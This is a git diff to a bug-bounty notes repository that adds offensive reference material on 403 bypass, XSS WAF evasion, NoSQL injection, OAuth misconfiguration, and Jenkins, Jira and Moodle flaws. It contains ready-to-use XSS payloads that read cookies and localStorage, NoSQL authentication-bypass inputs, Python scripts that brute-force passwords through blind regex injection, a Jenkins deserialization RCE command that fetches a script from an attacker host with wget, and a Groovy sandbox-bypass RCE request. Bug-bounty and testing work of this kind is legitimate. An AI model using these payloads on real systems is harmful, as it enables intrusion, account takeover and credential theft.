diff --git a/Bypass/Bypass 403.md b/Bypass/Bypass 403.md
index fe7e9ce..ba5efef 100644
--- a/Bypass/Bypass 403.md	
+++ b/Bypass/Bypass 403.md	
@@ -1,5 +1,11 @@
 # 403 Forbidden Bypass
 
+## Tools
+
+* [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403)
+
+
+## Exploit
 1. Using "X-Original-URL" header
 ```
 GET /admin HTTP/1.1
@@ -21,15 +27,18 @@ Try this to bypass
 http://target.com/%2e/admin => 200
 ```
 
-3. Try add dot (.) and slash (/) in the URL
+3. Try add dot (.) slash (/) and semicolon (;) in the URL
 ```
 http://target.com/admin => 403
 ```
 Try this to bypass
 ```
-http://target.com/admin/. => 200
-http://target.com//admin// => 200
-http://target.com/./admin/./ => 200
+http://target.com/secret/. => 200
+http://target.com//secret// => 200
+http://target.com/./secret/.. => 200
+http://target.com/;/secret => 200
+http://target.com/.;/secret => 200
+http://target.com//;//secret => 200
 ```
 
 4. Add "..;/" after the directory name
@@ -58,4 +67,6 @@ Host: victim.com
 X­-Original-­URL: /admin
 ```
 
-Source: [@iam_j0ker](https://twitter.com/iam_j0ker)
+Source: 
+- [@iam_j0ker](https://twitter.com/iam_j0ker)
+- [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web)
diff --git a/Cross Site Scripting.md b/Cross Site Scripting.md
index 53016c9..1d29e70 100644
--- a/Cross Site Scripting.md	
+++ b/Cross Site Scripting.md	
@@ -336,5 +336,50 @@ javascript://%250Aalert(1)
 <!--><svg onload=alert(1)-->
 ```
 
+## Bypass WAF
+1. Cloudflare
+```
+<svg%0Aonauxclick=0;[1].some(confirm)//
+
+<svg onload=alert%26%230000000040"")>
+
+<a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1)&rpar;>
+<svg onx=() onload=(confirm)(1)>
+
+<svg onx=() onload=(confirm)(document.cookie)>
+
+<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
+
+Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
+
+"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
+
+Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
+
+"><onx=[] onmouseover=prompt(1)>
+
+%2sscript%2ualert()%2s/script%2u -xss popup
+
+<svg onload=alert%26%230000000040"1")>
+
+"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
+
+[1].map(confirm)'ale'+'rt'()a&Tab;l&Tab;e&Tab;r&Tab;t(1)prompt&lpar;1&rpar;prompt&#40;1&#41;prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
+
+<svg onload=prompt%26%230000000040document.domain)>
+
+<svg onload=prompt%26%23x000000028;document.domain)>
+
+<svg/onrandom=random onload=confirm(1)>
+
+<video onnull=null onmouseover=confirm(1)>
+
+<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
+
+:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
+
+<img ignored=() src=x onerror=prompt(1)>
+```
+
 Reference:
 - [Brute Logic](https://brutelogic.com.br/)
\ No newline at end of file
diff --git a/Misc/Broken Link Hijacking.md b/Misc/Broken Link Hijacking.md
index 75557b0..3dcedca 100644
--- a/Misc/Broken Link Hijacking.md	
+++ b/Misc/Broken Link Hijacking.md	
@@ -1,14 +1,14 @@
 # Broken Link Hijacking
-## **Introduction**
-Broken Link Hijacking (BLH) exists whenever a target links to an expired domain or page
 
-## **How to Find**
+## Tools
+- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker)
+  
+## Definition
+Broken Link Hijacking exists whenever a target links to an expired domain or page
+
+## How to find
 1. Manually find external links on the target site (For example, check some links to social media accounts)
-2. Try [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) tools to find broken link, this is the command
-
-```
-blc -rof --filter-level 3 https://vuln.com/
-```
+2. Try using tools to find broken link, for example using tools that listed in this readme
 
 References:
 - [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/)
diff --git a/Misc/Exposed API keys.md b/Misc/Exposed API keys.md
new file mode 100644
index 0000000..2558fee
--- /dev/null
+++ b/Misc/Exposed API keys.md	
@@ -0,0 +1,10 @@
+# Exposed API Keys
+
+## Tools
+* [Key-Checker](https://github.com/daffainfo/Key-Checker)
+
+## Definition
+Sometimes in a web application, an attacker can find some exposed API keys which can lead to financial loss to a company.
+
+## How to exploit
+[keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys
\ No newline at end of file
diff --git a/NoSQL Injection.md b/NoSQL Injection.md
index 0f70829..6054e7f 100644
--- a/NoSQL Injection.md	
+++ b/NoSQL Injection.md	
@@ -1 +1,143 @@
-# Soon!
\ No newline at end of file
+## NoSQL injection
+
+## Tools
+
+* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
+
+## Exploit
+
+### Authentication Bypass
+
+Basic authentication bypass using not equal ($ne) or greater ($gt)
+
+```
+in the request
+- username[$ne]=toto&password[$ne]=toto
+- login[$regex]=a.*&pass[$ne]=lol
+- login[$gt]=admin&login[$lt]=test&pass[$ne]=1
+- login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
+```
+
+```json
+The output is
+{"username": {"$ne": null}, "password": {"$ne": null}}
+{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
+{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
+{"username": {"$gt":""}, "password": {"$gt":""}}
+```
+
+### Extract length information
+
+```json
+username[$ne]=toto&password[$regex]=.{1}
+username[$ne]=toto&password[$regex]=.{3}
+```
+
+### Extract data information
+
+```json
+in URL
+username[$ne]=toto&password[$regex]=m.{2}
+username[$ne]=toto&password[$regex]=md.{1}
+username[$ne]=toto&password[$regex]=mdp
+
+username[$ne]=toto&password[$regex]=m.*
+username[$ne]=toto&password[$regex]=md.*
+
+in JSON
+{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
+{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
+{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
+```
+
+### Extract data with "in"
+
+```json
+{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
+```
+
+### PHP Arbitrary Function Execution
+```json
+"user":{"$func": "var_dump"}
+```
+
+## Blind NoSQL
+
+### POST
+
+```python
+import requests
+import urllib3
+import string
+import urllib
+urllib3.disable_warnings()
+
+username="admin"
+password=""
+u="http://example.org/login"
+headers={'content-type': 'application/json'}
+
+while True:
+    for c in string.printable:
+        if c not in ['*','+','.','?','|']:
+            payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
+            r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
+            if 'OK' in r.text or r.status_code == 302:
+                print("Found one more char : %s" % (password+c))
+                password += c
+```
+
+### GET
+
+```python
+import requests
+import urllib3
+import string
+import urllib
+urllib3.disable_warnings()
+
+username='admin'
+password=''
+u='http://example.org/login'
+
+while True:
+  for c in string.printable:
+    if c not in ['*','+','.','?','|', '#', '&', '$']:
+      payload='?username=%s&password[$regex]=^%s' % (username, password + c)
+      r = requests.get(u + payload)
+      if 'Yeah' in r.text:
+        print("Found one more char : %s" % (password+c))
+        password += c
+```
+
+Another example using sleep to check vuln or not
+```
+'%2bsleep(1)%2b'
+```
+
+### MongoDB Payloads
+
+```bash
+true, $where: '1 == 1'
+, $where: '1 == 1'
+$where: '1 == 1'
+', $where: '1 == 1'
+1, $where: '1 == 1'
+{ $ne: 1 }
+', $or: [ {}, { 'a':'a
+' } ], $comment:'successful MongoDB injection'
+db.injection.insert({success:1});
+db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
+|| 1==1
+' && this.password.match(/.*/)//+%00
+' && this.passwordzz.match(/.*/)//+%00
+'%20%26%26%20this.password.match(/.*/)//+%00
+'%20%26%26%20this.passwordzz.match(/.*/)//+%00
+{$gt: ''}
+[$ne]=1
+```
+
+## References
+
+* [Hacktricks](https://book.hacktricks.xyz/pentesting-web/nosql-injection)
+* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/NoSQL%20Injection/README.md)
\ No newline at end of file
diff --git a/OAuth Misconfiguration.md b/OAuth Misconfiguration.md
new file mode 100644
index 0000000..77d11d0
--- /dev/null
+++ b/OAuth Misconfiguration.md	
@@ -0,0 +1,13 @@
+# OAuth Misconfiguration
+1. OAuth token stealing: Changing redirect_uri to attacker(.)com(Use IDN Homograph or common bypasses).
+2. Change Referral header to attacker(.)com while requesting OAuth.
+3. Create an account with victim@gmail(.)com with normal functionality. Create account with victim@gmail(.)com using OAuth functionality. Now try to login using previous credentials.
+4. OAuth Token Re-use.
+5. Missing or broken state parameter.
+6. Lack of origin check.
+7. Open Redirection on another endpoint > Use it in redirect_uri
+8. If there is an email parameter after signin then try to change the email parameter to victim's one.
+9. Try to remove email from the scope and add victim's email manually.
+10. Only company's email is allowed? > Try to replace hd=company(.)com to hd=gmail(.)com
+11.  Check if its leaking client_secret parameter.
+12.  Go to the browser history and check if the token is there.
\ No newline at end of file
diff --git a/README.md b/README.md
index 458f20b..0f845aa 100644
--- a/README.md
+++ b/README.md
@@ -1,18 +1,24 @@
 # All about bug bounty
 These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too!
 
+![](https://img.shields.io/github/issues/daffainfo/AllAboutBugBounty)
+![](https://img.shields.io/github/forks/daffainfo/AllAboutBugBounty)
+![](https://img.shields.io/github/stars/daffainfo/AllAboutBugBounty)
+![](https://img.shields.io/github/last-commit/daffainfo/AllAboutBugBounty)
+
 ## List
 - [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
-- SQL Injection (SOON)
-- NoSQL Injection (SOON)
-- Local File Inclusion (SOON)
 - [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
 - [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
-- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
-- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
 - [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
 - [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Exposed%20Source%20Code.md)
 - [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
+- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
+- Local File Inclusion (SOON)
+- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
+- SQL Injection (SOON)
+- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
+- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
 - [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
 
 ## List Bypass
@@ -28,7 +34,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
 
 ## List Framework
 - [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md)
-- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.MD)
+- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.md)
 
 ## Miscellaneous
 - [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
@@ -38,7 +44,11 @@ These are my bug bounty notes that I have gathered from various sources, you can
 - [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md)
 - [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md)
 - [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
-- [Unauthenticated Jira CVE](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
+
+## Technologies
+- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
+- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
+- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
 
 ## Reconnaissance
 - [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
diff --git a/Technologies/Jenkins.md b/Technologies/Jenkins.md
new file mode 100644
index 0000000..f52e3d0
--- /dev/null
+++ b/Technologies/Jenkins.md
@@ -0,0 +1,66 @@
+## Jenkins
+1. Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)
+
+Use [ysoserial](https://github.com/frohoff/ysoserial) to generate a payload.
+Then RCE using [this script](./rce/jenkins_rce_cve-2015-8103_deser.py):
+
+```bash
+java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.sh' > payload.out
+./jenkins_rce.py jenkins_ip jenkins_port payload.out
+```
+
+2. Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1)
+
+Details [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html).
+
+If the Jenkins requests authentication but returns valid data using the following request, it is vulnerable:
+```bash
+curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a
+```
+
+3. Metaprogramming RCE in Jenkins Plugins (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002)
+
+Original RCE vulnerability [here](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html), full exploit [here](https://github.com/petercunha/jenkins-rce).
+
+Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc).
+
+4. CVE-2019-1003030
+
+How to Exploit:
+- [PacketStorm](https://packetstormsecurity.com/files/159603/Jenkins-2.63-Sandbox-Bypass.html)
+
+```
+GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {
+  public x(){
+"ping -c 1 xx.xx.xx.xx".execute()
+}
+} HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+URL Encoding the following for RCE
+```
+public class x {
+  public x(){
+"ping -c 1 xx.xx.xx.xx".execute()
+    }
+}
+```
+to
+
+%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d
+
+5. Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392)
+
+How to exploit:
+- [@jas502n](https://github.com/jas502n/CVE-2019-10392)
+- [iwantmore.pizza](https://iwantmore.pizza/posts/cve-2019-10392.html)
+
+Reference: 
+- https://github.com/gquere/pwn_jenkins
\ No newline at end of file
diff --git a/Misc/Unauthenticated Jira CVE.md b/Technologies/Jira.md
similarity index 97%
rename from Misc/Unauthenticated Jira CVE.md
rename to Technologies/Jira.md
index 9d9034e..291f004 100644
--- a/Misc/Unauthenticated Jira CVE.md	
+++ b/Technologies/Jira.md
@@ -59,4 +59,7 @@ Connection: close
 12.   CVE-2019-3402 (XSS)
 ```
 https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
-```
\ No newline at end of file
+```
+
+Reference:
+- https://twitter.com/harshbothra
\ No newline at end of file
diff --git a/Technologies/Moodle.md b/Technologies/Moodle.md
new file mode 100644
index 0000000..bb4a6d1
--- /dev/null
+++ b/Technologies/Moodle.md
@@ -0,0 +1,12 @@
+# Moodle
+
+1. Reflected XSS in /mod/lti/auth.php via “redirect_url” parameter
+```
+https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
+```
+
+2. Open redirect in /mod/lti/auth.php in “redirect_url” parameter
+
+```
+https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com
+```
\ No newline at end of file